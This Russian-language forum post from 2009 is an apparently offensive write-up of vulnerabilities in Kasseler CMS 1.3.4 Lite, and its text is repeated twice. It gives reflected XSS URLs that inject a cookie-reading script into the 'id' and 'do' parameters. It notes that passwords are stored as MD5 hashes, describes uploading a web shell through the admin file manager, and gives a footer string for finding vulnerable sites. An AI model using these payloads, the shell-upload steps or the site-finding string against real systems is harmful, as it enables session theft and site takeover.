Kraneg
27.01.2009, 11:14
Kasseler CMS 1.3.4 Lite возможно и ранние версии
http://www.kasseler-cms.net/
Пасивные XSS:
1.http://*****.ru/index.php?module=News&do=View&id=<script>alert(document.cookie)</script>
или
2.http://*****.ru/index.php?module=News&do=<script>alert(document.cookie)</script>&id=1
Вообще вместо этих ссылок можно использовать любую... Уязвимые параметры ID и DO именно в них и прокатывает пасивка
hash - md5
Заливка шела:
Переходим в админку -> Файловый менеджер -> Выбираем нужный нам каталог -> и внизу можно залить файлы в него
Как искать:
by Kasseler CMS. All rights reserved.
Если что то не так прошу меня поправить... =) Все таки первое что нашел сам =)
http://www.kasseler-cms.net/
Пасивные XSS:
1.http://*****.ru/index.php?module=News&do=View&id=<script>alert(document.cookie)</script>
или
2.http://*****.ru/index.php?module=News&do=<script>alert(document.cookie)</script>&id=1
Вообще вместо этих ссылок можно использовать любую... Уязвимые параметры ID и DO именно в них и прокатывает пасивка
hash - md5
Заливка шела:
Переходим в админку -> Файловый менеджер -> Выбираем нужный нам каталог -> и внизу можно залить файлы в него
Как искать:
by Kasseler CMS. All rights reserved.
Если что то не так прошу меня поправить... =) Все таки первое что нашел сам =)